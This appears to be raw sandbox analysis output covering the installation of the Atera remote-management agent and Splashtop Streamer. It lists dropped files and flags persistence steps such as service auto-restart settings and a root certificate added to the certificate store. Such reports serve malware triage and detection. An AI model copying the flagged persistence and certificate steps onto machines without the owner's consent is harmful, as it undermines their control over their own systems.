                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRUtility.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRFeatMini.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.TypeConverter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x86\SRWacomUtil32.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Concurrent.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B72.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\xdwmark.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x86\SRUsb.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.FileSystem.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Data.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\Polly.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\fips.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\setupdrv.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\64bits\WdfCoInstaller01009.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Linq.Expressions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.Utils.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x64\lci_proxyumd.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Pipes.AccessControl.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.ReaderWriter.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-fibers-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\choco.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxywddm.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\stgamepad.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Mail.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Principal.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\msquic.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAudioResample.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x86\SRCredentialProvider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-multibyte-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Cryptography.Cng.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\WdfCoInstaller01009.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.ServicePoint.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscorrc.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.Lightweight.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_proxyumd.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\amf-vcedem-win32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Sockets.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\stvideo.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Wacom\x64\SRWacomCtrl64.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdwmark.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\OpenHardwareMonitorLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\GamePad\utils\devcon64.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI12F6.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\ISRT.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeFile created: C:\Windows\Temp\unpack\SRSocketCtrl.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3352.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI65BF.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1DD5.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC961.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6457.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_is182.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_is9FE6.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\System32\SRCEF21.tmpJump to dropped file
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\Temp\unpack\PreVerCheck.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\ISRT.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA0BF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDCAB.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\_isE656.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI172D.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\ISRT.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDF3E.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6738.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC672.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{B7C5EA94-B96A-41F5-BE95-25D78B486678}\ARPPRODUCTICON.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F94.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFB85.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{87AA7DD5-455D-434C-80E8-C02BAF62BC90}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9FF2.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\ISRT.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeFile created: C:\Windows\Temp\unpack\libcrypto-3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIDEEF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6833.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF4AD.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{67C8555A-C946-4EFE-94E2-31ABF84FC74E}\_isFD6A.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\Temp\SplashtopStreamer.exeJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{6F76B734-D534-49DB-8B2F-C42ABA90C4F4}\_isres_0x0409.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE0C6.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5CE.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6B72.tmpJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\ISRT.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIDCAB.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeFile created: C:\Windows\Temp\unpack\libssl-3.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\system32\SRCredentialProvider.dll (copy)Jump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSIC961.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BBD793 __EH_prolog3_GS,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileIntW,37_2_00BBD793
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\xp64\license.txtJump to behavior
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\dotnet\LICENSE.txtJump to behavior

                                Boot Survival

                                barindex
                                Installs Task Scheduler Managed Wrapper
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote\
                                Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote\Splashtop Streamer.lnk
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0040C4FA IsIconic,GetWindowPlacement,GetWindowRect,36_2_0040C4FA
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeCode function: 37_2_00BB5BC9 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,37_2_00BB5BC9
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeRegistry key monitored for changes: HKEY_USERS.DEFAULT\Software\Classes
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeKey value created or modified: HKEY_USERS.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C Blob
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
